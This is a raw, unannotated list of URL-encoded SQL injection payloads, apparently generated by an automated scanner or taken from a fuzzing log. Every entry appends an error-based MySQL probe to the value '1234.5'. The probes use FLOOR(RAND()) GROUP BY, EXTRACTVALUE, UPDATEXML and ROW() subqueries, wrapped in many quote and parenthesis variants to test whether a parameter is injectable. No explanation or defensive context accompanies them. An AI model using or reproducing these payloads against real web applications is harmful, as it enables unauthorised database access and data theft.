1234.5%22%20AND%20%28SELECT%207374%20FROM%28SELECT%20COUNT%28%2A%29%2CCONCAT%280x3a6762783a%2C%28SELECT%20%28CASE%20WHEN%20%287374%3D7374%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a656e623a%2CFLOOR%28RAND%280%29%2A2%29%29x%20FROM%20INFORMATION_SCHEMA.CHARACTER_SETS%20GROUP%20BY%20x%29a%29%20AND%20%22zjqO%22%20LIKE%20%22zjqO 1234.5%29%20WHERE%208708%3D8708%20AND%20%28SELECT%207374%20FROM%28SELECT%20COUNT%28%2A%29%2CCONCAT%280x3a6762783a%2C%28SELECT%20%28CASE%20WHEN%20%287374%3D7374%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a656e623a%2CFLOOR%28RAND%280%29%2A2%29%29x%20FROM%20INFORMATION_SCHEMA.CHARACTER_SETS%20GROUP%20BY%20x%29a%29 1234.5%27%29%20WHERE%204892%3D4892%20AND%20%28SELECT%207374%20FROM%28SELECT%20COUNT%28%2A%29%2CCONCAT%280x3a6762783a%2C%28SELECT%20%28CASE%20WHEN%20%287374%3D7374%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a656e623a%2CFLOOR%28RAND%280%29%2A2%29%29x%20FROM%20INFORMATION_SCHEMA.CHARACTER_SETS%20GROUP%20BY%20x%29a%29 1234.5%27%20WHERE%209398%3D9398%20AND%20%28SELECT%207374%20FROM%28SELECT%20COUNT%28%2A%29%2CCONCAT%280x3a6762783a%2C%28SELECT%20%28CASE%20WHEN%20%287374%3D7374%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a656e623a%2CFLOOR%28RAND%280%29%2A2%29%29x%20FROM%20INFORMATION_SCHEMA.CHARACTER_SETS%20GROUP%20BY%20x%29a%29 1234.5%22%20WHERE%208964%3D8964%20AND%20%28SELECT%207374%20FROM%28SELECT%20COUNT%28%2A%29%2CCONCAT%280x3a6762783a%2C%28SELECT%20%28CASE%20WHEN%20%287374%3D7374%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a656e623a%2CFLOOR%28RAND%280%29%2A2%29%29x%20FROM%20INFORMATION_SCHEMA.CHARACTER_SETS%20GROUP%20BY%20x%29a%29 1234.5%27%20%7C%7C%20%28SELECT%204842%20FROM%20DUAL%20WHERE%203130%3D3130%20AND%20%28SELECT%207374%20FROM%28SELECT%20COUNT%28%2A%29%2CCONCAT%280x3a6762783a%2C%28SELECT%20%28CASE%20WHEN%20%287374%3D7374%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a656e623a%2CFLOOR%28RAND%280%29%2A2%29%29x%20FROM%20INFORMATION_SCHEMA.CHARACTER_SETS%20GROUP%20BY%20x%29a%29%20%29%20%7C%7C%20%27 1234.5%27%20%7C%7C%20%28SELECT%209098%20WHERE%205948%3D5948%20AND%20%28SELECT%207374%20FROM%28SELECT%20COUNT%28%2A%29%2CCONCAT%280x3a6762783a%2C%28SELECT%20%28CASE%20WHEN%20%287374%3D7374%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a656e623a%2CFLOOR%28RAND%280%29%2A2%29%29x%20FROM%20INFORMATION_SCHEMA.CHARACTER_SETS%20GROUP%20BY%20x%29a%29%20%29%20%7C%7C%20%27 1234.5%20%2B%20%28SELECT%202501%20FROM%20DUAL%20WHERE%201147%3D1147%20AND%20%28SELECT%207374%20FROM%28SELECT%20COUNT%28%2A%29%2CCONCAT%280x3a6762783a%2C%28SELECT%20%28CASE%20WHEN%20%287374%3D7374%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a656e623a%2CFLOOR%28RAND%280%29%2A2%29%29x%20FROM%20INFORMATION_SCHEMA.CHARACTER_SETS%20GROUP%20BY%20x%29a%29%20%29 1234.5%20%2B%20%28SELECT%206625%20WHERE%209412%3D9412%20AND%20%28SELECT%207374%20FROM%28SELECT%20COUNT%28%2A%29%2CCONCAT%280x3a6762783a%2C%28SELECT%20%28CASE%20WHEN%20%287374%3D7374%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a656e623a%2CFLOOR%28RAND%280%29%2A2%29%29x%20FROM%20INFORMATION_SCHEMA.CHARACTER_SETS%20GROUP%20BY%20x%29a%29%20%29 1234.5%27%20%2B%20%28SELECT%20%27vIMk%27%20FROM%20DUAL%20WHERE%207346%3D7346%20AND%20%28SELECT%207374%20FROM%28SELECT%20COUNT%28%2A%29%2CCONCAT%280x3a6762783a%2C%28SELECT%20%28CASE%20WHEN%20%287374%3D7374%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a656e623a%2CFLOOR%28RAND%280%29%2A2%29%29x%20FROM%20INFORMATION_SCHEMA.CHARACTER_SETS%20GROUP%20BY%20x%29a%29%20%29%20%2B%20%27 1234.5%27%20%2B%20%28SELECT%20%27shzy%27%20WHERE%207795%3D7795%20AND%20%28SELECT%207374%20FROM%28SELECT%20COUNT%28%2A%29%2CCONCAT%280x3a6762783a%2C%28SELECT%20%28CASE%20WHEN%20%287374%3D7374%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a656e623a%2CFLOOR%28RAND%280%29%2A2%29%29x%20FROM%20INFORMATION_SCHEMA.CHARACTER_SETS%20GROUP%20BY%20x%29a%29%20%29%20%2B%20%27 1234.5%27%20IN%20BOOLEAN%20MODE%29%20AND%20%28SELECT%207374%20FROM%28SELECT%20COUNT%28%2A%29%2CCONCAT%280x3a6762783a%2C%28SELECT%20%28CASE%20WHEN%20%287374%3D7374%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a656e623a%2CFLOOR%28RAND%280%29%2A2%29%29x%20FROM%20INFORMATION_SCHEMA.CHARACTER_SETS%20GROUP%20BY%20x%29a%29%20%23 1234.5%29%20AND%20EXTRACTVALUE%289752%2CCONCAT%280x5c%2C0x3a6762783a%2C%28SELECT%20%28CASE%20WHEN%20%289752%3D9752%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a656e623a%29%29 1234.5%27%29%20AND%20EXTRACTVALUE%289752%2CCONCAT%280x5c%2C0x3a6762783a%2C%28SELECT%20%28CASE%20WHEN%20%289752%3D9752%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a656e623a%29%29 1234.5%27%20AND%20EXTRACTVALUE%289752%2CCONCAT%280x5c%2C0x3a6762783a%2C%28SELECT%20%28CASE%20WHEN%20%289752%3D9752%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a656e623a%29%29 1234.5%22%20AND%20EXTRACTVALUE%289752%2CCONCAT%280x5c%2C0x3a6762783a%2C%28SELECT%20%28CASE%20WHEN%20%289752%3D9752%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a656e623a%29%29 1234.5%29%20AND%20EXTRACTVALUE%289752%2CCONCAT%280x5c%2C0x3a6762783a%2C%28SELECT%20%28CASE%20WHEN%20%289752%3D9752%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a656e623a%29%29%20AND%20%283370%3D3370 1234.5%29%29%20AND%20EXTRACTVALUE%289752%2CCONCAT%280x5c%2C0x3a6762783a%2C%28SELECT%20%28CASE%20WHEN%20%289752%3D9752%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a656e623a%29%29%20AND%20%28%285051%3D5051 1234.5%29%29%29%20AND%20EXTRACTVALUE%289752%2CCONCAT%280x5c%2C0x3a6762783a%2C%28SELECT%20%28CASE%20WHEN%20%289752%3D9752%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a656e623a%29%29%20AND%20%28%28%285988%3D5988 1234.5%20AND%20EXTRACTVALUE%289752%2CCONCAT%280x5c%2C0x3a6762783a%2C%28SELECT%20%28CASE%20WHEN%20%289752%3D9752%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a656e623a%29%29 1234.5%27%29%20AND%20EXTRACTVALUE%289752%2CCONCAT%280x5c%2C0x3a6762783a%2C%28SELECT%20%28CASE%20WHEN%20%289752%3D9752%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a656e623a%29%29%20AND%20%28%27ZiCa%27%3D%27ZiCa 1234.5%27%29%29%20AND%20EXTRACTVALUE%289752%2CCONCAT%280x5c%2C0x3a6762783a%2C%28SELECT%20%28CASE%20WHEN%20%289752%3D9752%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a656e623a%29%29%20AND%20%28%28%27oABu%27%3D%27oABu 1234.5%27%29%29%29%20AND%20EXTRACTVALUE%289752%2CCONCAT%280x5c%2C0x3a6762783a%2C%28SELECT%20%28CASE%20WHEN%20%289752%3D9752%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a656e623a%29%29%20AND%20%28%28%28%27bZTo%27%3D%27bZTo 1234.5%27%20AND%20EXTRACTVALUE%289752%2CCONCAT%280x5c%2C0x3a6762783a%2C%28SELECT%20%28CASE%20WHEN%20%289752%3D9752%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a656e623a%29%29%20AND%20%27OyYX%27%3D%27OyYX 1234.5%27%29%20AND%20EXTRACTVALUE%289752%2CCONCAT%280x5c%2C0x3a6762783a%2C%28SELECT%20%28CASE%20WHEN%20%289752%3D9752%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a656e623a%29%29%20AND%20%28%27wLbq%27%20LIKE%20%27wLbq 1234.5%27%29%29%20AND%20EXTRACTVALUE%289752%2CCONCAT%280x5c%2C0x3a6762783a%2C%28SELECT%20%28CASE%20WHEN%20%289752%3D9752%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a656e623a%29%29%20AND%20%28%28%27pbsW%27%20LIKE%20%27pbsW 1234.5%27%29%29%29%20AND%20EXTRACTVALUE%289752%2CCONCAT%280x5c%2C0x3a6762783a%2C%28SELECT%20%28CASE%20WHEN%20%289752%3D9752%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a656e623a%29%29%20AND%20%28%28%28%27Qhva%27%20LIKE%20%27Qhva 1234.5%27%20AND%20EXTRACTVALUE%289752%2CCONCAT%280x5c%2C0x3a6762783a%2C%28SELECT%20%28CASE%20WHEN%20%289752%3D9752%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a656e623a%29%29%20AND%20%27MCgC%27%20LIKE%20%27MCgC 1234.5%22%29%20AND%20EXTRACTVALUE%289752%2CCONCAT%280x5c%2C0x3a6762783a%2C%28SELECT%20%28CASE%20WHEN%20%289752%3D9752%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a656e623a%29%29%20AND%20%28%22stRc%22%3D%22stRc 1234.5%22%29%29%20AND%20EXTRACTVALUE%289752%2CCONCAT%280x5c%2C0x3a6762783a%2C%28SELECT%20%28CASE%20WHEN%20%289752%3D9752%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a656e623a%29%29%20AND%20%28%28%22Oton%22%3D%22Oton 1234.5%22%29%29%29%20AND%20EXTRACTVALUE%289752%2CCONCAT%280x5c%2C0x3a6762783a%2C%28SELECT%20%28CASE%20WHEN%20%289752%3D9752%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a656e623a%29%29%20AND%20%28%28%28%22XueU%22%3D%22XueU 1234.5%22%20AND%20EXTRACTVALUE%289752%2CCONCAT%280x5c%2C0x3a6762783a%2C%28SELECT%20%28CASE%20WHEN%20%289752%3D9752%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a656e623a%29%29%20AND%20%22eVsn%22%3D%22eVsn 1234.5%22%29%20AND%20EXTRACTVALUE%289752%2CCONCAT%280x5c%2C0x3a6762783a%2C%28SELECT%20%28CASE%20WHEN%20%289752%3D9752%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a656e623a%29%29%20AND%20%28%22ddWy%22%20LIKE%20%22ddWy 1234.5%22%29%29%20AND%20EXTRACTVALUE%289752%2CCONCAT%280x5c%2C0x3a6762783a%2C%28SELECT%20%28CASE%20WHEN%20%289752%3D9752%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a656e623a%29%29%20AND%20%28%28%22UHdk%22%20LIKE%20%22UHdk 1234.5%22%29%29%29%20AND%20EXTRACTVALUE%289752%2CCONCAT%280x5c%2C0x3a6762783a%2C%28SELECT%20%28CASE%20WHEN%20%289752%3D9752%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a656e623a%29%29%20AND%20%28%28%28%22OZyq%22%20LIKE%20%22OZyq 1234.5%22%20AND%20EXTRACTVALUE%289752%2CCONCAT%280x5c%2C0x3a6762783a%2C%28SELECT%20%28CASE%20WHEN%20%289752%3D9752%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a656e623a%29%29%20AND%20%22ivFm%22%20LIKE%20%22ivFm 1234.5%29%20WHERE%206020%3D6020%20AND%20EXTRACTVALUE%289752%2CCONCAT%280x5c%2C0x3a6762783a%2C%28SELECT%20%28CASE%20WHEN%20%289752%3D9752%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a656e623a%29%29 1234.5%27%29%20WHERE%203018%3D3018%20AND%20EXTRACTVALUE%289752%2CCONCAT%280x5c%2C0x3a6762783a%2C%28SELECT%20%28CASE%20WHEN%20%289752%3D9752%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a656e623a%29%29 1234.5%27%20WHERE%209508%3D9508%20AND%20EXTRACTVALUE%289752%2CCONCAT%280x5c%2C0x3a6762783a%2C%28SELECT%20%28CASE%20WHEN%20%289752%3D9752%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a656e623a%29%29 1234.5%22%20WHERE%203365%3D3365%20AND%20EXTRACTVALUE%289752%2CCONCAT%280x5c%2C0x3a6762783a%2C%28SELECT%20%28CASE%20WHEN%20%289752%3D9752%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a656e623a%29%29 1234.5%27%20%7C%7C%20%28SELECT%202065%20FROM%20DUAL%20WHERE%207265%3D7265%20AND%20EXTRACTVALUE%289752%2CCONCAT%280x5c%2C0x3a6762783a%2C%28SELECT%20%28CASE%20WHEN%20%289752%3D9752%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a656e623a%29%29%20%29%20%7C%7C%20%27 1234.5%27%20%7C%7C%20%28SELECT%207835%20WHERE%208102%3D8102%20AND%20EXTRACTVALUE%289752%2CCONCAT%280x5c%2C0x3a6762783a%2C%28SELECT%20%28CASE%20WHEN%20%289752%3D9752%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a656e623a%29%29%20%29%20%7C%7C%20%27 1234.5%20%2B%20%28SELECT%205984%20FROM%20DUAL%20WHERE%201020%3D1020%20AND%20EXTRACTVALUE%289752%2CCONCAT%280x5c%2C0x3a6762783a%2C%28SELECT%20%28CASE%20WHEN%20%289752%3D9752%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a656e623a%29%29%20%29 1234.5%20%2B%20%28SELECT%205876%20WHERE%205569%3D5569%20AND%20EXTRACTVALUE%289752%2CCONCAT%280x5c%2C0x3a6762783a%2C%28SELECT%20%28CASE%20WHEN%20%289752%3D9752%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a656e623a%29%29%20%29 1234.5%27%20%2B%20%28SELECT%20%27xCBC%27%20FROM%20DUAL%20WHERE%203162%3D3162%20AND%20EXTRACTVALUE%289752%2CCONCAT%280x5c%2C0x3a6762783a%2C%28SELECT%20%28CASE%20WHEN%20%289752%3D9752%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a656e623a%29%29%20%29%20%2B%20%27 1234.5%27%20%2B%20%28SELECT%20%27biKl%27%20WHERE%208689%3D8689%20AND%20EXTRACTVALUE%289752%2CCONCAT%280x5c%2C0x3a6762783a%2C%28SELECT%20%28CASE%20WHEN%20%289752%3D9752%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a656e623a%29%29%20%29%20%2B%20%27 1234.5%27%20IN%20BOOLEAN%20MODE%29%20AND%20EXTRACTVALUE%289752%2CCONCAT%280x5c%2C0x3a6762783a%2C%28SELECT%20%28CASE%20WHEN%20%289752%3D9752%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a656e623a%29%29%20%23 1234.5%29%20AND%20UPDATEXML%289335%2CCONCAT%280x2e%2C0x3a6762783a%2C%28SELECT%20%28CASE%20WHEN%20%289335%3D9335%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a656e623a%29%2C9882%29 1234.5%27%29%20AND%20UPDATEXML%289335%2CCONCAT%280x2e%2C0x3a6762783a%2C%28SELECT%20%28CASE%20WHEN%20%289335%3D9335%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a656e623a%29%2C9882%29 1234.5%27%20AND%20UPDATEXML%289335%2CCONCAT%280x2e%2C0x3a6762783a%2C%28SELECT%20%28CASE%20WHEN%20%289335%3D9335%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a656e623a%29%2C9882%29 1234.5%22%20AND%20UPDATEXML%289335%2CCONCAT%280x2e%2C0x3a6762783a%2C%28SELECT%20%28CASE%20WHEN%20%289335%3D9335%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a656e623a%29%2C9882%29 1234.5%29%20AND%20UPDATEXML%289335%2CCONCAT%280x2e%2C0x3a6762783a%2C%28SELECT%20%28CASE%20WHEN%20%289335%3D9335%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a656e623a%29%2C9882%29%20AND%20%289533%3D9533 1234.5%29%29%20AND%20UPDATEXML%289335%2CCONCAT%280x2e%2C0x3a6762783a%2C%28SELECT%20%28CASE%20WHEN%20%289335%3D9335%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a656e623a%29%2C9882%29%20AND%20%28%285398%3D5398 1234.5%29%29%29%20AND%20UPDATEXML%289335%2CCONCAT%280x2e%2C0x3a6762783a%2C%28SELECT%20%28CASE%20WHEN%20%289335%3D9335%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a656e623a%29%2C9882%29%20AND%20%28%28%288308%3D8308 1234.5%20AND%20UPDATEXML%289335%2CCONCAT%280x2e%2C0x3a6762783a%2C%28SELECT%20%28CASE%20WHEN%20%289335%3D9335%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a656e623a%29%2C9882%29 1234.5%27%29%20AND%20UPDATEXML%289335%2CCONCAT%280x2e%2C0x3a6762783a%2C%28SELECT%20%28CASE%20WHEN%20%289335%3D9335%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a656e623a%29%2C9882%29%20AND%20%28%27vIUL%27%3D%27vIUL 1234.5%27%29%29%20AND%20UPDATEXML%289335%2CCONCAT%280x2e%2C0x3a6762783a%2C%28SELECT%20%28CASE%20WHEN%20%289335%3D9335%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a656e623a%29%2C9882%29%20AND%20%28%28%27DOuO%27%3D%27DOuO 1234.5%27%29%29%29%20AND%20UPDATEXML%289335%2CCONCAT%280x2e%2C0x3a6762783a%2C%28SELECT%20%28CASE%20WHEN%20%289335%3D9335%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a656e623a%29%2C9882%29%20AND%20%28%28%28%27MyNt%27%3D%27MyNt 1234.5%27%20AND%20UPDATEXML%289335%2CCONCAT%280x2e%2C0x3a6762783a%2C%28SELECT%20%28CASE%20WHEN%20%289335%3D9335%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a656e623a%29%2C9882%29%20AND%20%27UAwU%27%3D%27UAwU 1234.5%27%29%20AND%20UPDATEXML%289335%2CCONCAT%280x2e%2C0x3a6762783a%2C%28SELECT%20%28CASE%20WHEN%20%289335%3D9335%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a656e623a%29%2C9882%29%20AND%20%28%27ZIQw%27%20LIKE%20%27ZIQw 1234.5%27%29%29%20AND%20UPDATEXML%289335%2CCONCAT%280x2e%2C0x3a6762783a%2C%28SELECT%20%28CASE%20WHEN%20%289335%3D9335%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a656e623a%29%2C9882%29%20AND%20%28%28%27MJoj%27%20LIKE%20%27MJoj 1234.5%27%29%29%29%20AND%20UPDATEXML%289335%2CCONCAT%280x2e%2C0x3a6762783a%2C%28SELECT%20%28CASE%20WHEN%20%289335%3D9335%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a656e623a%29%2C9882%29%20AND%20%28%28%28%27tEzY%27%20LIKE%20%27tEzY 1234.5%27%20AND%20UPDATEXML%289335%2CCONCAT%280x2e%2C0x3a6762783a%2C%28SELECT%20%28CASE%20WHEN%20%289335%3D9335%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a656e623a%29%2C9882%29%20AND%20%27vUef%27%20LIKE%20%27vUef 1234.5%22%29%20AND%20UPDATEXML%289335%2CCONCAT%280x2e%2C0x3a6762783a%2C%28SELECT%20%28CASE%20WHEN%20%289335%3D9335%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a656e623a%29%2C9882%29%20AND%20%28%22nzwG%22%3D%22nzwG 1234.5%22%29%29%20AND%20UPDATEXML%289335%2CCONCAT%280x2e%2C0x3a6762783a%2C%28SELECT%20%28CASE%20WHEN%20%289335%3D9335%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a656e623a%29%2C9882%29%20AND%20%28%28%22PHxY%22%3D%22PHxY 1234.5%22%29%29%29%20AND%20UPDATEXML%289335%2CCONCAT%280x2e%2C0x3a6762783a%2C%28SELECT%20%28CASE%20WHEN%20%289335%3D9335%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a656e623a%29%2C9882%29%20AND%20%28%28%28%22slAn%22%3D%22slAn 1234.5%22%20AND%20UPDATEXML%289335%2CCONCAT%280x2e%2C0x3a6762783a%2C%28SELECT%20%28CASE%20WHEN%20%289335%3D9335%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a656e623a%29%2C9882%29%20AND%20%22cEKg%22%3D%22cEKg 1234.5%22%29%20AND%20UPDATEXML%289335%2CCONCAT%280x2e%2C0x3a6762783a%2C%28SELECT%20%28CASE%20WHEN%20%289335%3D9335%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a656e623a%29%2C9882%29%20AND%20%28%22qQFa%22%20LIKE%20%22qQFa 1234.5%22%29%29%20AND%20UPDATEXML%289335%2CCONCAT%280x2e%2C0x3a6762783a%2C%28SELECT%20%28CASE%20WHEN%20%289335%3D9335%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a656e623a%29%2C9882%29%20AND%20%28%28%22NXLF%22%20LIKE%20%22NXLF 1234.5%22%29%29%29%20AND%20UPDATEXML%289335%2CCONCAT%280x2e%2C0x3a6762783a%2C%28SELECT%20%28CASE%20WHEN%20%289335%3D9335%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a656e623a%29%2C9882%29%20AND%20%28%28%28%22UwsT%22%20LIKE%20%22UwsT 1234.5%22%20AND%20UPDATEXML%289335%2CCONCAT%280x2e%2C0x3a6762783a%2C%28SELECT%20%28CASE%20WHEN%20%289335%3D9335%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a656e623a%29%2C9882%29%20AND%20%22iyka%22%20LIKE%20%22iyka 1234.5%29%20WHERE%208563%3D8563%20AND%20UPDATEXML%289335%2CCONCAT%280x2e%2C0x3a6762783a%2C%28SELECT%20%28CASE%20WHEN%20%289335%3D9335%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a656e623a%29%2C9882%29 1234.5%27%29%20WHERE%205728%3D5728%20AND%20UPDATEXML%289335%2CCONCAT%280x2e%2C0x3a6762783a%2C%28SELECT%20%28CASE%20WHEN%20%289335%3D9335%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a656e623a%29%2C9882%29 1234.5%27%20WHERE%202837%3D2837%20AND%20UPDATEXML%289335%2CCONCAT%280x2e%2C0x3a6762783a%2C%28SELECT%20%28CASE%20WHEN%20%289335%3D9335%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a656e623a%29%2C9882%29 1234.5%22%20WHERE%206506%3D6506%20AND%20UPDATEXML%289335%2CCONCAT%280x2e%2C0x3a6762783a%2C%28SELECT%20%28CASE%20WHEN%20%289335%3D9335%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a656e623a%29%2C9882%29 1234.5%27%20%7C%7C%20%28SELECT%202734%20FROM%20DUAL%20WHERE%207777%3D7777%20AND%20UPDATEXML%289335%2CCONCAT%280x2e%2C0x3a6762783a%2C%28SELECT%20%28CASE%20WHEN%20%289335%3D9335%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a656e623a%29%2C9882%29%20%29%20%7C%7C%20%27 1234.5%27%20%7C%7C%20%28SELECT%201470%20WHERE%207055%3D7055%20AND%20UPDATEXML%289335%2CCONCAT%280x2e%2C0x3a6762783a%2C%28SELECT%20%28CASE%20WHEN%20%289335%3D9335%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a656e623a%29%2C9882%29%20%29%20%7C%7C%20%27 1234.5%20%2B%20%28SELECT%207392%20FROM%20DUAL%20WHERE%204208%3D4208%20AND%20UPDATEXML%289335%2CCONCAT%280x2e%2C0x3a6762783a%2C%28SELECT%20%28CASE%20WHEN%20%289335%3D9335%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a656e623a%29%2C9882%29%20%29 1234.5%20%2B%20%28SELECT%205483%20WHERE%208016%3D8016%20AND%20UPDATEXML%289335%2CCONCAT%280x2e%2C0x3a6762783a%2C%28SELECT%20%28CASE%20WHEN%20%289335%3D9335%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a656e623a%29%2C9882%29%20%29 1234.5%27%20%2B%20%28SELECT%20%27LYDy%27%20FROM%20DUAL%20WHERE%204080%3D4080%20AND%20UPDATEXML%289335%2CCONCAT%280x2e%2C0x3a6762783a%2C%28SELECT%20%28CASE%20WHEN%20%289335%3D9335%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a656e623a%29%2C9882%29%20%29%20%2B%20%27 1234.5%27%20%2B%20%28SELECT%20%27CzGN%27%20WHERE%204685%3D4685%20AND%20UPDATEXML%289335%2CCONCAT%280x2e%2C0x3a6762783a%2C%28SELECT%20%28CASE%20WHEN%20%289335%3D9335%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a656e623a%29%2C9882%29%20%29%20%2B%20%27 1234.5%27%20IN%20BOOLEAN%20MODE%29%20AND%20UPDATEXML%289335%2CCONCAT%280x2e%2C0x3a6762783a%2C%28SELECT%20%28CASE%20WHEN%20%289335%3D9335%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a656e623a%29%2C9882%29%20%23 1234.5%29%20AND%20ROW%289031%2C5324%29%3E%28SELECT%20COUNT%28%2A%29%2CCONCAT%280x3a6762783a%2C%28SELECT%20%28CASE%20WHEN%20%289031%3D9031%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a656e623a%2CFLOOR%28RAND%280%29%2A2%29%29x%20FROM%20%28SELECT%209031%20UNION%20SELECT%205324%29a%20GROUP%20BY%20x%20LIMIT%201%29 1234.5%27%29%20AND%20ROW%289031%2C5324%29%3E%28SELECT%20COUNT%28%2A%29%2CCONCAT%280x3a6762783a%2C%28SELECT%20%28CASE%20WHEN%20%289031%3D9031%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a656e623a%2CFLOOR%28RAND%280%29%2A2%29%29x%20FROM%20%28SELECT%209031%20UNION%20SELECT%205324%29a%20GROUP%20BY%20x%20LIMIT%201%29 1234.5%27%20AND%20ROW%289031%2C5324%29%3E%28SELECT%20COUNT%28%2A%29%2CCONCAT%280x3a6762783a%2C%28SELECT%20%28CASE%20WHEN%20%289031%3D9031%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a656e623a%2CFLOOR%28RAND%280%29%2A2%29%29x%20FROM%20%28SELECT%209031%20UNION%20SELECT%205324%29a%20GROUP%20BY%20x%20LIMIT%201%29 1234.5%22%20AND%20ROW%289031%2C5324%29%3E%28SELECT%20COUNT%28%2A%29%2CCONCAT%280x3a6762783a%2C%28SELECT%20%28CASE%20WHEN%20%289031%3D9031%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a656e623a%2CFLOOR%28RAND%280%29%2A2%29%29x%20FROM%20%28SELECT%209031%20UNION%20SELECT%205324%29a%20GROUP%20BY%20x%20LIMIT%201%29 1234.5%29%20AND%20ROW%289031%2C5324%29%3E%28SELECT%20COUNT%28%2A%29%2CCONCAT%280x3a6762783a%2C%28SELECT%20%28CASE%20WHEN%20%289031%3D9031%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a656e623a%2CFLOOR%28RAND%280%29%2A2%29%29x%20FROM%20%28SELECT%209031%20UNION%20SELECT%205324%29a%20GROUP%20BY%20x%20LIMIT%201%29%20AND%20%281745%3D1745 1234.5%29%29%20AND%20ROW%289031%2C5324%29%3E%28SELECT%20COUNT%28%2A%29%2CCONCAT%280x3a6762783a%2C%28SELECT%20%28CASE%20WHEN%20%289031%3D9031%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a656e623a%2CFLOOR%28RAND%280%29%2A2%29%29x%20FROM%20%28SELECT%209031%20UNION%20SELECT%205324%29a%20GROUP%20BY%20x%20LIMIT%201%29%20AND%20%28%287569%3D7569 1234.5%29%29%29%20AND%20ROW%289031%2C5324%29%3E%28SELECT%20COUNT%28%2A%29%2CCONCAT%280x3a6762783a%2C%28SELECT%20%28CASE%20WHEN%20%289031%3D9031%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a656e623a%2CFLOOR%28RAND%280%29%2A2%29%29x%20FROM%20%28SELECT%209031%20UNION%20SELECT%205324%29a%20GROUP%20BY%20x%20LIMIT%201%29%20AND%20%28%28%284066%3D4066 